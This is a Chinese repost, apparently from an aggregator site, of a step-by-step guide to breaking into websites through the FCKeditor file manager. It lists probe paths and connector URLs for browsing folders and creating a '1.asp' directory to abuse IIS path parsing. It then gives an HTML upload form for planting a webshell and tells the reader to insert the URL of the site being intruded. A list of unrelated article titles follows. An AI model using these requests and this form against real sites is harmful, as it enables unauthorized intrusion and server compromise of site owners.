F4ck Fckeditor 的精简总结
来源:互联网 发布:电子书资源知乎 编辑:程序博客网 时间:2024/05/22 02:02
首先,你得确定下Fckeditor的版本。
/FCKeditor/editor/dialog/fck_about.html
其次,你确定下以下几个上传页面是否真的被删除了呢?
/FCKeditor/editor/filemanager/browser/default/browser.html
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/upload/test.html
/FCKeditor/editor/filemanager/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html
嗯,好吧,都已经删除了,真是太倒霉了,怎么办,确认下这些文件有哪个存在的么
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/fckeditor/editor/filemanager/connectors/asp/connector.asp
/fckeditor/editor/filemanager/connectors/php/connector.php
如果存在,那太好了,你可以继续看下去了,我这里以aspx的为例
1.查看Media目录下的文件:
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F
红色Media可以更改为File或者image,相应的进入文件或者图片目录下
2.利用iis解析漏洞创建1.asp特殊目录
fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp
红色的是对应的Media目录,蓝色的是特殊目录名字
3.构建表单,上传webshell到特殊目录
<form id=”frmUpload” enctype=”multipart/form-data” action=”http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2Fasp.asp” method=”post”>
Upload a new file:<br>
<input type=”file” name=”NewFile” size=”50″><br>
<input id=”btnUpload” type=”submit” value=”Upload”>
</form>
将以上代表保存为HTML格式,http://www.xxx.com修改成你入侵的网站地址,Type=Media是对应的Media目录,1.asp为特殊目录名。
最后的一些提示
上传之后的路径需要你在上传表单里面的代码里找,当然,他的呈现方式是一个上传好了的文件名,全路径必须你自己组合,我相信你是会的。如果访问之后发现无 法访问,试着上传一张正确的图片,再进行访问,如果访问成功,说明管理员已经补上了IIS路径解析漏洞,那你得另找出路了。
- F4ck Fckeditor 的精简总结
- FCKEditor的精简与使用
- FCKeditor的配置与精简
- fckeditor 2.6.6的精简
- 精简FCKeditor
- asp.net使用FCKeditor功能的精简
- f4ck论坛的小游戏(灌水贴)
- FCKeditor 2.6 精简版
- 在线编辑器fckeditor的精简,使用和配置
- 最新FCKeditor 精简配置(FCKeditor配置使用)
- FCKEDITOR精简、安装及设置
- FCKeditor总结
- 【仿CSDN学生大本营】asp.net使用FCKeditor功能的精简实例
- FCKeditor的几则学习总结
- 关于struts2和fckeditor整合的总结
- fckeditor精简及如何瘦身编辑
- 测试新版FCKeditor编辑器精简版
- 一些精简的tuning总结~ *转
- git服务器搭建
- 纵向一级列表
- poj 2762 Going from u to v or from v to u?
- 编写超酷jQuery插件的10点建议
- 打造自己的vim界面--用winmanager合并显示NERDTree和TagList
- F4ck Fckeditor 的精简总结
- Build WebKit On Windows
- 统计文本中单词使用频率
- Git常用操作命令收集
- Eclipse调试Android工具集锦之二-DDMS
- JavaScript中的new-prototype面向对象实现原理
- 多线程知识点-java
- iphone UI 开发教程
- C语言和设计模式(适配器模式) 【文章都是来自网络,只要自己吸取了就是自己的】